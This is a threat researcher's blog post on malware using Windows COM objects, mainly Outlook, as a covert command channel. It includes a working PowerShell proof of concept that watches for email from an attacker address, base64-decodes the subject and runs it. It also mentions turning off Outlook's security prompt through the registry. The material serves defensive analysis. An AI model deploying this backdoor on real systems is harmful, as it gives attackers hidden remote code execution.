Malware and COM Object – The paradise of covert channels

Windows COM object & common usage by malware developers

The COM (Component Object Model technology) object is a technology developed by Microsoft for Windows systems. The purpose of this technology is to be able to control another application like an object. The technology could be considered as an inter-process communication channel.

This technology is well known by malware developers. For example in August 2014, I wrote, on VirusBulletin, an article about IcoScript1. It’s a RAT (Remote Administration Tool) that is using a COM object to manipulate Internet Explorer. This choice brings a lot of advantages for the malware developers:

  • It’s stealth: only 2 APIs are used CoInitialize(), CoCreateInstance();
  • Internet Explorer’s configuration is transparently used (proxy configuration, …);
  • Easy to code.

Today, this usage of Internet Explorer’s COM object is frequently used by malware developers. The experts of Sekoia’s CERT frequently run into this approach during malware analysis.

Uncommon usage: Outlook instrumentation

Microsoft provides a lot of other interesting COM objects that could be used by malware developers in order to communicate with their C&C. Basically 2 applications are always connected to the Internet on a user’s computer:

  • The browser (we spoke about this topic on the previous part);

  • The email client.

Microsoft Office Outlook is frequently used in a professional environment. Obviously, Microsoft provides a COM object in order to manipulate an “Outlook object”. Its name is “Outlook.Application”. For example, this object allows a developer:

  • To manipulate emails: read, write, remove…

  • To generate events: client starting, client closing, new email…

Thank to this features, malware developers could imagine this communication channel design:

  • Step 1: the malware is waiting for a new incoming email;

  • Step 2: the malware checks the identity of the sender;

  • Step 3: If the identity is the malware operator, the content of the object is decoded and executed;

  • Step 4: the email is removed and the process goes back to step 1

This complete implementation can be realized in less than 20 lines with Powershell:

$action = {
  $outlook = new-object -com outlook.application;
  $ns = $outlook.GetNameSpace(“MAPI”);
  $inbox = $ns.GetDefaultFolder(6);
  $inbox.items | foreach {
    if($_.unread -eq $True) {
      if ($_.SenderEmailAddress.equals(“supervilain@vilain.fr”)) {
        $command = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($_.Subject))
        $job = { Invoke-Expression -Command: $args[0] }
        Start-Job -Name ex -ScriptBlock $job -ArgumentList $command
        $_.Delete()
      }
    }
  }
}
$ol = new-object -com outlook.application;
$null = Register-ObjectEvent $ol NewMailEx -SourceIdentifier MyAlert -Action $Action;

The code is not really complex to be understood. Here is a video in order to see the behavior on the infected system, when the subject is “Y21kLmV4ZSAvQyBjYWxjLmV4ZQ==” (cmd.exe /C calc.exe):

By default, Microsoft Office Outlook does not allow this external interaction and a popup is shown to the user. Sadly, the notification can easily be switched off by modifying a few registry keys2.

To increase the efficiency of this design, the operator could use the content of a spam because everybody receives daily spam without noticing them…

Conclusion

COM objects are really powerful and really convenient for developers. However this power can be used by bad actors. The experts of the Sekoia’s CERT know that the Office Outlook instrumentation by a malware is already used to add additional monitoring and logging on email servers in order to ease digital investigation through a incident response.

1 https://www.virusbtn.com/virusbulletin/archive/2014/08/vb201408-IcoScript

2 http://www.slipstick.com/developer/change-programmatic-access-options/

 

Paul Rascagneres

Senior threat researcher, malware analyst and IT conf speaker…

Recent Posts

Categories

Archives

Paul Rascagneres Written by:

Senior threat researcher, malware analyst and IT conf speaker...

Comments are closed.